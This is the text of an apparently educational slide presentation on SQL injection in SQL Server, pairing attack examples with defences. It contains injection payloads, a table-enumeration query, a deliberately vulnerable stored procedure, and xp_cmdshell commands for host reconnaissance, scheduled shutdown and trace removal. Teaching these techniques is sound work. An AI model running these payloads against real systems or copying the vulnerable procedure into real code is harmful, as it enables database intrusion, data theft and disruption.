Devouring Security Sqli is an exploitation and prevention presentation that I did a while back. The presentation accompanies a screen recording which could be located at http://vimeo.com/gmaran23
3. Disclaimer
Techniques and Tools in this presentation
should be used or applied on an application,
only with prior consent of the application’s
owner.
Illegal otherwise.
4. Sqli – Media coverage
http://pastebin.com/HUjZPaF3
5. Sqli – Media coverage
http://thepiratebay.se/torrent/6443601
10. Sqli – Why does it exist?
Yeah! I can develop/deploy without restrictions , I have full
access.
Thanks bro! I am your uninvited database administrator now. I owe you, and
your data.
I like them admin rights
11. Sqli – Why does it exist?
Conglomeration of Sensitive Data
Would you keep all your belongings in your home, or would you keep some in your
safe deposit box?
Blindly Trusting Unsanitized User Input
"Over thousands of queries in a moderate- to large-size application, that 2% can result
in a handful of SQL injections," Chou says. "All an attacker needs to do is find one
of these, and you'll have millions of records stolen and a headline in Dark
Reading.“
12. Sqli – Why does it exist?
• It’s not always about a developer knowing
better,
there are tons and tons of legacy code
• Remember, DBA’s write SQL too
• No strict access control policies
• Windows based/Desktop based applications
are directly ported to the web
• Developer’s still don’t know the complete
truths about Sqli
13. Sqli 101
../Products?name=rat
SELECT 1 FROM Products WHERE ProductName
= ‘rat‘
../Products?name=rat‘ or 1=1 -SELECT 1 FROM Products WHERE ProductName
= ‘rat’ or 1=1 -- ’
or true
19. Sqli E
-- table enumerator
SELECT TOP 1 Convert(INT, NAME)
FROM sys.tables
WHERE object_id = (
SELECT TOP 1 object_id
FROM (
SELECT TOP 2 object_id
FROM sys.tables
ORDER BY object_id
) AS TEMP
ORDER BY object_id DESC
)
Enumerating in MySQl is very easy with OFFSET.
20. ORMs and SPs Loopholes
http://sqli:8020/SqliORM/ProductSearch
21. It’s not an ORM’s problem to have
you loaded with features
ALTER PROCEDURE SearchProducts (@Item VARCHAR(100))
AS
BEGIN
DECLARE @query VARCHAR(400)
SET @query = 'SELECT * FROM Products WHERE ProductName LIKE ''%' + @Item + '%'''
PRINT @query
EXEC (@query)
END
GO
---------------------------------------------------------------------------------------------- Execute good
EXEC SearchProducts 'chai'
GO
-- Execute bad
EXEC SearchProducts 'chai%'' or 1=1--'
GO
22. Fixing SP Loopholes
ALTER PROCEDURE SearchProductsBetter (@Item VARCHAR(200))
AS
BEGIN
DECLARE @safequery NVARCHAR(400)
DECLARE @params NVARCHAR(200)
SET @safequery = N'SELECT * FROM Products WHERE
ProductName LIKE ''%'' + @param1 + ''%'''
SET @params = N'@param1 NVARCHAR(200)‘;
EXECUTE SP_EXECUTESQL @safequery
,@params
,@param1 = @Item
END
GO
---------------------------------------------------------------------------------------------- Execute bad
EXEC SearchProductsBetter 'chai%'' or 1=1--'
GO
25. Profiling Host OS
-- play time!
exec xp_cmdshell 'tasklist‘
exec master.dbo.xp_cmdshell 'whoami‘
exec xp_cmdshell 'netsh advfirewall firewall
show rule name=all profile=public'
26. Profiling Host OS
-- enumerate and remove trace
create table tempsz(temp varchar(MAX));insert into tempsz exec
xp_cmdshell 'tasklist';select * from tempsz;drop table tempsz;
-- enumerate and leave trace
create table tempsz(temp varchar(MAX));insert into tempsz exec
xp_cmdshell 'tasklist';
-- get enumerated information and remove trace
select temp from tempsz;drop table tempsz;
27. Profiling Host OS
-- schedule a shutdown and send message to the user named
maran
exec xp_cmdshell 'shutdown -s -t 6000'; exec xp_cmdshell 'msg
maran You will be shut down in 100 minutes'
-- abort the shutdown and send message to the user named
maran
exec xp_cmdshell 'shutdown -a'; exec xp_cmdshell 'msg maran I
have heard your prayer. You are salvaged'
48. Core Defense
CREATE PROCEDURE dbo.doQuery (@id NCHAR(4))
AS
DECLARE @query NCHAR(64)
IF RTRIM(@id) LIKE '[0-9][0-9][0-9][0-9]'
BEGIN
SELECT @query = 'select ccnum from cust where id = ''' + @id + ''''
EXEC @query
END
RETURN
-- Or, better yet, force an interger parameter
CREATE PROCEDURE dbo.doQuery(@id smallint)
50. Core Defense
Encrypt data to prevent disclosure when physical
database files are stolen.
1. Encryption does not do a darn thing to protect
you from direct Sqli
2. Encryption only protects you from Sqli induced
attacks
57. What now?
Sqli Cheatsheet http://ferruh.mavituna.com/sql-injectioncheatsheet-oku
Dynamic queries in T-SQL http://www.sommarskog.se/dyn-search2005.html
http://www.sommarskog.se/dyn-search2008.html
58. End of the world
Watch the screen recording of this presentation
at my vimeo channel
Devouring Security – Sql Injection Part 1 http://vimeo.com/83658524
Devouring Security – Sql Injection Part 2 –
http://vimeo.com/85256464